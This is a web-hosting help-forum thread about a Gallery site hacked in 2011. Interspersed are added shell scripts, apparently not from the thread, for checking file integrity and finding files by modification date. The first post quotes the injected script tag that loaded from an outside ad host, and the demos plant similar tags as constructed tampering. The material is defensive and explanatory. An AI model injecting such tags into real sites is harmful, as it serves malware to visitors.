Security problem

manderly

Joined: 2008-04-04
Posts: 71
Posted: Wed, 2011-09-21 14:46

Hi,

Last week someone got into my gallery and put this line of code (<script language="javascript" src="http://admagnet1.com/?campaignid=12451598&type=tracking"></script>) at the bottom of the page in my index.php file and the main.php file....these are the ones that I know of...there might be more?

This bad link has now caused this error message listed below to pop up when people try to access my gallery...Google Chrome is the browser which produces this message...

"Warning: Something's Not Right Here!
www.illinoisancestors.org contains malware. Your computer might catch a virus if you visit this site."

I can remove the line of code but it keeps coming back. How can I prevent the hacker from continually putting the line back in the php files?

The hosting company ran a malware scan on my server and there isn't a problem. I also ran a deep scan for malware on my computer and it is clean as well.

My website is http://www.illinoisancestors.org/cemphotos/main.php
Gallery version = 2.3.1 core 1.3.0.1

thank you so very much for your help,
manderly

 
Dayo

Joined: 2005-11-04
Posts: 1642
Posted: Wed, 2011-09-21 15:12

Change all passwords associated with your site.
G2, ftp, control panel as well as passwords for any other applications you run with the same host.

However, the intruder has probably already left an access script sitting on your server and may not need the passwords any longer. So in addition to the change (still needed), you must verify each and every single file you have on the server to get rid of this.

G2 has a file integrity verification script to help with elements in the G2 folder. You will have to check other folders yourself. Run the G2 installer to Step 2 to activate the file integrity checks.

--
dakanji.com
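Dayo's point about verifying each and every file, as an added example that is not Gallery's own integrity checker and not code from anyone in this thread: take a SHA-256 manifest from a known-good copy of the web root, then compare the live tree against it. A checksum mismatch catches an edited index.php; the separate "not in manifest" list catches a file that was dropped in, which a checksum comparison alone would never mention. Function names are hypothetical; it needs only POSIX sh plus sha256sum from GNU coreutils.

```shell
#!/bin/sh
# Added example (not Gallery's own integrity checker): build a SHA-256 manifest from a
# known-good copy of the web root, then compare the live tree against it.
# Hypothetical helper names; relies only on POSIX sh plus sha256sum from GNU coreutils.
set -eu

# abs_path FILE : print FILE as an absolute path (the check steps cd into the web root)
abs_path() {
    printf '%s/%s\n' "$(cd "$(dirname "$1")" && pwd)" "$(basename "$1")"
}

# build_manifest ROOT MANIFEST : record the SHA-256 of every regular file under ROOT
build_manifest() {
    ( cd "$1" && find . -type f -exec sha256sum {} + | LC_ALL=C sort -k2 ) > "$2"
}

# verify_manifest ROOT MANIFEST : print each file that no longer matches the manifest
# (modified or missing) and return 1 if there is any; return 0 if the tree is intact
verify_manifest() {
    manifest=$(abs_path "$2")
    failures=$( ( cd "$1" && sha256sum -c "$manifest" 2>/dev/null ) | grep -v ': OK$' || true )
    [ -z "$failures" ] && return 0
    printf '%s\n' "$failures"
    return 1
}

# list_new_files ROOT MANIFEST : print files present under ROOT that the manifest never
# recorded; a dropped access script shows up here rather than as a checksum mismatch
list_new_files() {
    manifest=$(abs_path "$2")
    live=$(mktemp); known=$(mktemp)
    ( cd "$1" && find . -type f -print | LC_ALL=C sort ) > "$live"
    awk '{ print $2 }' "$manifest" | LC_ALL=C sort > "$known"
    comm -23 "$live" "$known"
    rm -f "$live" "$known"
}

# Demonstration on a constructed throwaway tree (constructed data, not a real site)
demo() {
    work=$(mktemp -d)
    mkdir -p "$work/site/modules"
    printf '<?php echo "index"; ?>\n' > "$work/site/index.php"
    printf '<?php echo "main"; ?>\n'  > "$work/site/main.php"
    build_manifest "$work/site" "$work/known-good.sha256"   # taken while the tree is clean

    # constructed tampering so the checks have something to report: a tag appended to
    # index.php, and a new file that the manifest never saw
    printf '<script src="http://ads.example/x.js"></script>\n' >> "$work/site/index.php"
    printf '<?php /* constructed placeholder */ ?>\n' > "$work/site/modules/extra.php"

    echo "changed or missing:"; verify_manifest "$work/site" "$work/known-good.sha256" || true
    echo "not in manifest:";    list_new_files  "$work/site" "$work/known-good.sha256"
    rm -rf "$work"
}
demo
```

The manifest is only as trustworthy as the copy it was built from, so build it from a fresh download of the application or from a backup that predates the incident, and keep it off the web server; a manifest stored next to the files it describes can be rewritten by whoever edited the files.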

 
manderly

Joined: 2008-04-04
Posts: 71
Posted: Thu, 2011-09-22 18:24

Hi,

Thank you for your helpful advice. I've changed all of my passwords.

heartfelt thanks,
manderly

 
floridave

Joined: 2003-12-22
Posts: 27300
Posted: Fri, 2011-09-23 02:13

Your host should be able to assist as well in doing an investigation.
You should also look at your files with Afro or your hosts file manager and see the date modified of files and do your own investigation.

Dave
_____________________________________________
Blog & G2 || floridave - Gallery Team

 
Dayo

Joined: 2005-11-04
Posts: 1642
Posted: Fri, 2011-09-23 04:59
manderly wrote:
I've changed all of my passwords.

You now need to check every file on the server.
Bear in mind that if you have more than one domain, you need to change every password and check every file on every one of the domains.

The next thing is that you should upgrade all applications and especially third party plugins for those to latest versions as he might be simply exploiting an application on your site. I believe G2.2.6+ should be fine but you are better off with G2.3.1.

If you are running something like Joomla, make sure third party plugins you use are not on their vulnerable extensions list.

Implement a firewall on your server. PHPIDS is a nice simple one.

--
dakanji.com

 
manderly

Joined: 2008-04-04
Posts: 71
Posted: Fri, 2011-09-23 13:06

Hi,

Thank you for your help!

What is Afro?

Since I have thousands of webpages, it will be hard to check them all. I do know the date when the files were modified. It would be great if a software program could search all the files and list the ones that were modified on a specific date.

My hosting company said they would only run a malware check on my dedicated server (they concluded the server was clean) and it's up to me to figure out what files were infected and how the intruder got in.

heartfelt thanks,
manderly

 
manderly

Joined: 2008-04-04
Posts: 71
Posted: Fri, 2011-09-23 13:12

Hi Dayo,

You're right...I forgot about my other domains...they were infected too...

If I get to the point when I think the site is clean again, should I notify Google of my efforts and ask for a review...so that the Google error message will be removed?

This is a silly question...I wonder if Google knows what files were affected on my site or do they just check the index pages?

many thanks,
manderly

 
Dayo

Joined: 2005-11-04
Posts: 1642
Posted: Fri, 2011-09-23 13:50

When your sites are clean, Google will know when you inform them to check.

Follow this guide to clean your sites. There are no shortcuts.

http://25yearsofprogramming.com/blog/20070705.htm

If you do not thoroughly verify and clean out the sites as well as identify the original exploit or at least close all potential exploits, as sure as the sun will be up in the morning, the hacker will be back in and possibly enraged.

PS. BTW, this is not a G2 specific issue and it is highly unlikely that the exploit was through G2. As such, I'll advise you to post further queries on a server admin forum such as webhostingtalk.com.

PPS. This might help you scan for the modified files: http://www.cyberciti.biz/faq/howto-finding-files-by-date/. Note though that you have to close the original hole as well or else fixing/removing modified files will be futile.

--
dakanji.com

 
manderly

Joined: 2008-04-04
Posts: 71
Posted: Sat, 2011-09-24 23:20

Hi,

Thank you for your help...I'm sorry that I bother you...I have nowhere else to turn...

My gallery at http://www.illinoisancestors.org/cemphotos/main.php was definitely hacked into and it would be impossible for me to find all the files which were modified on 9/15...the day I was hacked.

I thought perhaps a command issued through "Cron Job" could identify all files which were modified on that day, but I have no idea how to do that...my level of expertise is dismal.

This security problem is way over my head...the only thing I can think of is to hire someone to look into my problem but I haven't found anyone who is interested in taking on the assignment...I'm desperate at this point...

thank you for everything,
manderly
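The search manderly is asking for, and the "finding files by date" approach Dayo linked, as an added example written for this thread rather than taken from it or from Gallery: list every regular file under a web root whose modification time falls on a given day, then narrow that list to files carrying a `<script>` tag that loads from an external host, the shape of the line quoted in the first post. It uses POSIX `find -newer` against two timestamp files rather than GNU's `-newermt`, so it runs on the stripped-down shells many hosts provide; the function names are hypothetical. The same script can be run once by hand or placed in a cron entry, but a one-off run is enough to answer the question asked here.

```shell
#!/bin/sh
# Added example, not from the thread or from Gallery: list the files under a web root whose
# modification time falls on a given day (POSIX find -newer against two timestamp files,
# so it works without GNU's -newermt) and flag those that carry a <script> tag loading
# from an external host. Function names are hypothetical.
set -eu

# files_modified_on ROOT YYYYMMDD : print regular files modified after 00:00:00 and
# no later than 23:59:59 on that day, sorted. Note that mtime is only a lead: an intruder
# can reset it, so an unremarkable timestamp does not prove a file is clean.
files_modified_on() {
    stamps=$(mktemp -d)
    touch -t "${2}0000"    "$stamps/start"
    touch -t "${2}2359.59" "$stamps/end"
    find "$1" -type f -newer "$stamps/start" ! -newer "$stamps/end" -print | LC_ALL=C sort
    rm -rf "$stamps"
}

# flag_external_scripts FILE... : print the files that contain a <script> tag with an
# absolute http(s) src, the shape of the injected line quoted at the top of the thread
flag_external_scripts() {
    [ $# -gt 0 ] || return 0
    grep -l -i -E '<script[^>]*src="https?://' "$@" 2>/dev/null || true
}

# Demonstration on a constructed tree with back-dated timestamps (constructed data)
demo() {
    work=$(mktemp -d)
    printf '<?php echo "hi"; ?>\n<script src="http://ads.example/t.js"></script>\n' > "$work/index.php"
    printf 'body { margin: 0 }\n' > "$work/style.css"
    printf '<?php echo "old"; ?>\n' > "$work/old.php"
    touch -t 201109151200 "$work/index.php" "$work/style.css"   # the day in question
    touch -t 201109101200 "$work/old.php"                       # untouched since earlier

    echo "modified on 2011-09-15:"
    files_modified_on "$work" 20110915
    echo "of those, carrying an external script tag:"
    # word-splitting the list is fine here because the constructed paths contain no spaces
    flag_external_scripts $(files_modified_on "$work" 20110915)
    rm -rf "$work"
}
demo
```

Run it against the document root of every domain on the server, not just the gallery, since the thread notes the other domains were touched too; and treat the list as a starting point for the review Dayo describes, not as the whole of it, because files whose timestamps were reset, and files that were added rather than edited, are not what a date search is built to find.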

 
floridave

Joined: 2003-12-22
Posts: 27300
Posted: Sun, 2011-09-25 01:16
 
Dayo

Joined: 2005-11-04
Posts: 1642
Posted: Sun, 2011-09-25 03:30

You should hire someone to do the job for you which is why I referred you to webhostingtalk. Take your sites offline, register there and ask for recommendations on a server admin.

Note that while your G2 installation was defaced, it is unlikely that this was the entry point to the server. This entry point is what needs to be identified as repairing anything without doing this first will be futile. As you noted, other domains were defaced as well. This is because the hacker can gain entry through one domain and then traverse to others to do as he wishes.

At this point, rather than focus on finding defaced files to fix, the key thing is finding out how the person got in at all.

Bear in mind that identifying the entry point requires reviewing the server logs and since these logs get rotated daily, every day spent without starting the task reduces the chances of conclusively doing so as the logs with the critical information might get rotated.

With the files modified ten days ago as you say, chances are high that the server logs have already been rotated in the interim since most tend to be on a 7-day cycle.

Go and hire the server admin right away. There are reputable ones on the webhostingtalk.com. The community there will give you pointers.

--
dakanji.com